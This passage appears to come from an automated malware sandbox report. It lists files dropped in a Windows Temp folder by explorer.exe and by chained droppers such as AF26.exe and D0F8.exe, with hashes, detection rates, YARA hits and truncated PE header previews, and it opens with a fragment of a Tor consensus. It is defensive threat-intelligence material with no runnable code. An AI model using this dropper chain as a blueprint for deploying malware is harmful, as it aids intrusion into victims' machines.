Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-20 23:00:00.fresh-until 2024-02-21 00:00:00.valid-until 2024-02-21 02:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

C:\Users\user\AppData\Local\Temp\7DFF.dll

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1708032
Entropy (8bit):	7.9242156636459615
Encrypted:	false
SSDEEP:	49152:rIjSYi/XzrDpaYFJnuFBTuLUwEPqKu6o:r7/XNbJSTuLUaKu
MD5:	519560FCAD4D5A600092E1958893072D
SHA1:	AE0823360C844A67B6AFB2932381C3D077625070
SHA-256:	D509B60FDFD560C42138628EA63A2C0966F940286C35C049DF492C7A093713EC
SHA-512:	976E3330B63D0AAE54997549D32D2F8F80D88599C9503EDF2B61DB1495B3F56AD54F531193169B1C48BC0BC66CA4298BF89572ECD57D381FE2F4B163F3A83F3A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... E..N...N...N.......N.......N......N.......N...O...N...N...N.......N.......N.......N.Rich..N.........PE..L......e...........!.....@..........^........P............................... ..........................................p...................................... 0..P................................................P...............................text....4.......@.................. ..`.rdata...V...P...`...P..............@..@.data...x...........................@....rsrc...............................@..@.reloc...F.......P..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\81F7.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1947648
Entropy (8bit):	7.947881684654529
Encrypted:	false
SSDEEP:	49152:2NVoFnW4i20zpdFRmgXBlLkHSCZ3aQx3PSGFivxfQhIrdY4I:/nW4iZ9dFwgXfLkHtZn3tF4xYh99
MD5:	91DAF47EC23BDC6E075F0B4D81F9D6C7
SHA1:	3C4FFCECCF97568EFEFF3939F51A12BBEE63F6AF
SHA-256:	35FA730ADFDD0B15211D9BC04950F44D90DAA9E72BB945D1158906B15FDDE7C7
SHA-512:	C1CA51F839569BFF829E3FD1E21D900833126CD320A7A36C74C149E5DC4A35BA61254DC6860EC51DEBB2B0AC91817639757D08BD34F8D7366EC1C9BA4F5EEC96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...p.2c.....................$......c"............@..................................s......................................l...<.....................................................................@............................................text............................... ..`.rdata..\|0.......2..................@..@.data....%.......T..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8BAD.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	7798568
Entropy (8bit):	6.547363220997618
Encrypted:	false
SSDEEP:	98304:1CbX2SIGOItWvMzsyfia505DCzjXAQj0d8sA811V/AUH:AIGZzV6KzHfE11V/Z
MD5:	ABA267CEA6CFB575DF0F5EAE54E22459
SHA1:	ABB044E92060787CC31AFDC26E18B0CBCBD451FA
SHA-256:	04EB716F3DA2E504A2A42DE697B19BCC66B673FCFBEAB0EF0B44D61567409C1C
SHA-512:	31296ED5A3A224707AB6C8A560C8DB7DF521AF9FDBB6B2B3D7919FEA2DA9AA217063F495F3AE07AF87770786529371AE738912C69702EAD59EE6E0499F46544C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T....................zt...........t.. ....t...@.. ........................v......%w...@...................................t.K.....t..............Nv.(.....v.....m.t.............................................. ............... ..H............text....yt.. ...zt................. ..`.sdata........t......~t.............@....rsrc.........t.......t.............@..@.reloc........v......Lv.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\98EC.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6602840
Entropy (8bit):	7.834820825847437
Encrypted:	false
SSDEEP:	196608:Vggwt0dDSNIB4Rmg2bjZYdyDhAGMlPIEPqAUcO/7RlHTO:q1DIB4RmgvAWJBL2PO
MD5:	BB91BC28144EE278CBEB31B29F91A0CE
SHA1:	5405A1244EB1F0A62D39B230D937A5D4D31AEC43
SHA-256:	FB6755D5606BED6B6E64F911C9F811F184CF748DE559F4309909AD55ABCAA71F
SHA-512:	8D7F9FB2F94AB2C24D881F328A03C7309912453FD6BAAEADFAFFDB09EF90A55484B9EDFB6AC32BE4A7D467D006D194713AD7F07BA2351CF635127BF9101519B7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....-.e.................D..........r............@.................................+.d...@...................................q..........d............d.X....p..D....................................................@;.L............................text....B.......................... ..`.rdata...)...`......................@..@.data..............................@....&u.&u...6..@...................... ..`.&u.&u......@;.....................@....&u.&u.@.V..P;...V................. ..`.reloc..D....p.......$V.............@..@.rsrc....d.......f...@V.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9E0E.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	431104
Entropy (8bit):	7.865829876036064
Encrypted:	false
SSDEEP:	6144:4phcsngKdHpPXECq6Xz4G/rmnHXekVB9YNeeA23YMd7pMFW54AXIEB93KWZMxEHL:4pasngwHpP5qa4G4eIWsyHd0XKBBXL
MD5:	1996A23C7C764A77CCACF5808FEC23B0
SHA1:	5A7141B167056BF8F01C067EBE12ED4CCC608DC7
SHA-256:	E40C8E14E8CB8A0667026A35E6E281C7A8A02BDF7BC39B53CFE0605E29372888
SHA-512:	430C8B43C2CBB937D2528FA79C754BE1A1B80C95C45C49DBA323E3FE6097A7505FC437DDAFAB54B21D00FBA9300B5FA36555535A6FA2EB656B5AA45CCF942E23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 91%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..Y..Y..3..p..Y..[....[..Y..V....X..RichY..................PE..L......d..........................................@......................................@.........................................................................P...................................................8............................text............................... ..`.rdata... ..........................@..@.data... ....0......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AF26.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9104384
Entropy (8bit):	7.9258891229768595
Encrypted:	false
SSDEEP:	196608:drdPa3Pl8j7Ke1k6N25U0agbrT6NZ+t0ZGhsYN6mQwclTm2:d5P08KeDQtSb+t0ZEJQwcTm
MD5:	CEAE65EE17FF158877706EDFE2171501
SHA1:	B1F807080DA9C25393C85F5D57105090F5629500
SHA-256:	0DAC8A3FE3C63611B49DB21B2756B781CC4C9117C64007E0C23E6D3E7CA9EE49
SHA-512:	5214FEBFAB691B53CA132E75E217E82A77E438250695D521DBF6BC1770D828F2E79A0070FD746A73E29ACC11BF9A62CEAFB1CF85547C7C0178D49A740FF9AE7B
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\AF26.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e................................ ... ....@.. .......................`............@.................................`...K.... ..@....................@....................................................... ............... ..H............text........ ..................... ..`.rsrc...@.... .....................@..@.reloc.......@.....................@..B........................H.......................'..............................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4979200
Entropy (8bit):	6.419395528077673
Encrypted:	false
SSDEEP:	49152:90oSiZ63YBmS9+rCgpvH8la0ZxRh+caGnj8HEQUhexTUT+1d/2/Tbt:0Ula0cGwXUheabt
MD5:	5E94F0F6265F9E8B2F706F1D46BBD39E
SHA1:	D0189CBA430F5EEA07EFE1AB4F89ADF5AE2453DB
SHA-256:	50A46B3120DA828502EF0CABA15DEFBAD004A3ADB88E6EACF1F9604572E2D503
SHA-512:	473DFA66A36FEED9B29A43245074141478327CE22BA7CCE512599379DCB783B4D665E2D65C5E9750B988C7ED8F6C3349A7A12D4B8B57C89840EEE6CA6E1A30CD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^..................9..X.......9.......9...@.......................... N..................@....................<......`<..B...`A.......................<.tk............................<.....................Ll<.......<......................text...8`9......b9................. ..`.itext...;....9..<...f9............. ..`.data.........9.......9.............@....bss....`.....:..........................idata...B...`<..D...\|:.............@....didata.......<.......:.............@....edata........<.......:.............@..@.tls....L.....<..........................rdata..].....<.......:.............@..@.reloc..tk....<..l....:.............@..B.rsrc........`A......<?.............@..@............. N.......K.............@..@................

C:\Users\user\AppData\Local\Temp\C53F.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	142848
Entropy (8bit):	6.729229199717194
Encrypted:	false
SSDEEP:	1536:tsXyFCHNHsDn7efMtblIRG+snWQFqkVrT9kTcFp0Yv29vW/K5XDve8IwjO1B+coA:uXiCHNlfJOQIrCQFq02FjTDjGBEHLn8
MD5:	4EFCEC7DF29A58ED31415372388D2824
SHA1:	57E9B5C26326EF791D3584E04A04B9A110AD6E60
SHA-256:	6DC26F797D26E14A93608FB681115C1EE3583A9796A9382DF3F7EA466E39866C
SHA-512:	10F386963195E41628073750B4AFE4CE53F569C802D98517CE119B1E14EA06F65BA6375C09BF967152DCA49A3E393C6D6B2F968CD5034EB4E20839355F3C4CAD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.h.............p.......p.......p...t...............w...p.......p.......p.......Rich............PE..L....7\c......................?...................@...........................A.................................................P....PA..&...........................................................................................................text.............................. ..`.rdata...).......*..................@..@.data...,_?......,..................@....rsrc....&...PA..(..................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D0F8.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4754167
Entropy (8bit):	7.998762175616803
Encrypted:	true
SSDEEP:	98304:InX3/YiWTVeEBbeCMYcwqHie4munwOzL6iD:wH/YiWTVTbKilpwOzL6U
MD5:	D3F837209D88F951D58F89320E087A95
SHA1:	DD375FE18BBFC217728BCA757BE978F4E23E3112
SHA-256:	2F54F197E70F40DE96A2BE48757F9E136AEA5D9BD388161F805CEF57A51BD58D
SHA-512:	24717E0B6435B2D8BEFEAD99DF2483D75D1F1ADAE2C7915364D4E5A3F2BBC3BB9D1DF9D18FE0233AB58CDBD60D2C88767800DDFA72356AC6CC08B2319A80A13E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\E4FE.exe

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4754167
Entropy (8bit):	7.998762175616803
Encrypted:	true
SSDEEP:	98304:InX3/YiWTVeEBbeCMYcwqHie4munwOzL6iD:wH/YiWTVTbKilpwOzL6U
MD5:	D3F837209D88F951D58F89320E087A95
SHA1:	DD375FE18BBFC217728BCA757BE978F4E23E3112
SHA-256:	2F54F197E70F40DE96A2BE48757F9E136AEA5D9BD388161F805CEF57A51BD58D
SHA-512:	24717E0B6435B2D8BEFEAD99DF2483D75D1F1ADAE2C7915364D4E5A3F2BBC3BB9D1DF9D18FE0233AB58CDBD60D2C88767800DDFA72356AC6CC08B2319A80A13E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\FourthX.exe

Process:	C:\Users\user\AppData\Local\Temp\AF26.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2654720
Entropy (8bit):	6.545978188908966
Encrypted:	false
SSDEEP:	49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
MD5:	B03886CB64C04B828B6EC1B2487DF4A4
SHA1:	A7B9A99950429611931664950932F0E5525294A4
SHA-256:	5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
SHA-512:	21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Process:	C:\Users\user\AppData\Local\Temp\AF26.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	2123218
Entropy (8bit):	7.9788749010606965
Encrypted:	false
SSDEEP:	49152:ChrF2z0X1W34qvuyXPHcqaGqW9gwLgMyu5noEiyIJAuw:ChFdFWINS/NF9gpMR5oEfF
MD5:	28B72E7425D6D224C060D3CF439C668C
SHA1:	A0A14C90E32E1FFD82558F044C351AD785E4DCD8
SHA-256:	460BA492FBC3163B80BC40813D840E50FEB84166DB7A300392669AFD21132D98
SHA-512:	3E0696B4135F3702DA054B80D98A8485FB7F3002C4148A327BC790B0D33C62D442C01890CC047AF19A17A149C8C8EB84777C4FF313C95EC6AF64A8BF0B2D54B6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................P............@..........................................P..(............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...(....P......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Process:	C:\Users\user\AppData\Local\Temp\8BAD.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvgrmkkb.tge.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umzg4guo.0h1.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp

Process:	C:\Users\user\AppData\Local\Temp\E4FE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	705536
Entropy (8bit):	6.505765981611094
Encrypted:	false
SSDEEP:	12288:qTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuYVwRxyF:iPcYn5c/rPx37/zHBA6pDp2mIEiYCRx+
MD5:	3ED810E886CB43A350DBCCD3A2939423
SHA1:	E7D7425F2BEE57051471FD114978F87E410EBA1B
SHA-256:	D13CA83378FB428F0C0DA6AA7EC8BA164C3FFD570E381FC40F3D3620B1541E4D
SHA-512:	364DDEE57D77F5DC7ED95AA4CD85A58C1225381F944693618294D2BCF3C32970ADF58C09C1B64930E65B02785A8C3C2CABB4FDA53B59AE6740251D66B3C44E6C
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp

Process:	C:\Users\user\AppData\Local\Temp\D0F8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	705536
Entropy (8bit):	6.505765981611094
Encrypted:	false
SSDEEP:	12288:qTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuYVwRxyF:iPcYn5c/rPx37/zHBA6pDp2mIEiYCRx+
MD5:	3ED810E886CB43A350DBCCD3A2939423
SHA1:	E7D7425F2BEE57051471FD114978F87E410EBA1B
SHA-256:	D13CA83378FB428F0C0DA6AA7EC8BA164C3FFD570E381FC40F3D3620B1541E4D
SHA-512:	364DDEE57D77F5DC7ED95AA4CD85A58C1225381F944693618294D2BCF3C32970ADF58C09C1B64930E65B02785A8C3C2CABB4FDA53B59AE6740251D66B3C44E6C
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp

Process:	C:\Users\user\AppData\Local\Temp\D0F8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	705536
Entropy (8bit):	6.505765981611094
Encrypted:	false
SSDEEP:	12288:qTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuYVwRxyF:iPcYn5c/rPx37/zHBA6pDp2mIEiYCRx+
MD5:	3ED810E886CB43A350DBCCD3A2939423
SHA1:	E7D7425F2BEE57051471FD114978F87E410EBA1B
SHA-256:	D13CA83378FB428F0C0DA6AA7EC8BA164C3FFD570E381FC40F3D3620B1541E4D
SHA-512:	364DDEE57D77F5DC7ED95AA4CD85A58C1225381F944693618294D2BCF3C32970ADF58C09C1B64930E65B02785A8C3C2CABB4FDA53B59AE6740251D66B3C44E6C
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_iscrypt.dll

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_isdecmp.dll

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.745960477552938
Encrypted:	false
SSDEEP:	384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
MD5:	A813D18268AFFD4763DDE940246DC7E5
SHA1:	C7366E1FD925C17CC6068001BD38EAEF5B42852F
SHA-256:	E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
SHA-512:	B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_setup64.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.289297026665552
Encrypted:	false
SSDEEP:	48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
MD5:	C8871EFD8AF2CF4D9D42D1FF8FADBF89
SHA1:	D0EACD5322C036554D509C7566F0BCC7607209BD
SHA-256:	E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
SHA-512:	2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_shfoldr.dll

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
